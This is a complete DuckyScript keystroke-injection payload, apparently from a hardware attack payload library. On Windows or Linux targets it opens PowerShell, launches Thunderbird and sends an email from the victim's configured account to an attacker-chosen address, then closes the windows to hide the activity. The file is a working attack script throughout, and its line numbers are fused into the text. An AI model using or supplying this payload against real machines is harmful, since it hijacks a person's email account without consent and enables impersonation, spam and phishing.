Path: blob/master/payloads/library/execution/SendEmailThroughThunderbird/payload.txt
3018 views
REM ########################################################1REM # |2REM # Title : Send Email Through Thunderbird |3REM # Author : Aleff |4REM # Version : 1.0 |5REM # Category : Execution |6REM # Target : Windows 10/11 - Linux(debian tested) |7REM # |8REM ########################################################91011REM Requirements:12REM - Internet Connection13REM - Thunderbird installed and email configured14REM - ExecutionPolicy Bypass (for Windows target)1516REM This payload is tested on:17REM - Ubuntu 23.0418REM - Windows 111920REM REQUIRED - Set receiver email address21DEFINE EMAIL-ADDRESS [email protected]2223REM REQUIRED - Set email Subject24DEFINE SUBJECT example2526REM REQUIRED - Set email message27DEFINE MESSAGE example282930REM # PowerShell31DELAY 100032GUI r33DELAY 100034STRING powershell35ENTER36DELAY 200037STRINGLN Start-Process "thunderbird.exe"38DELAY 40003940REM # Thunderbird41CTRL n42DELAY 200043STRING EMAIL-ADDRESS44DELAY 50045TAB46DELAY 50047TAB48DELAY 50049STRING SUBJECT50DELAY 50051TAB52DELAY 50053STRING MESSAGE54DELAY 50055CTRL ENTER56DELAY 200057ENTER5859REM # End actions60DELAY 200061ALT F462DELAY 100063ALT F4646566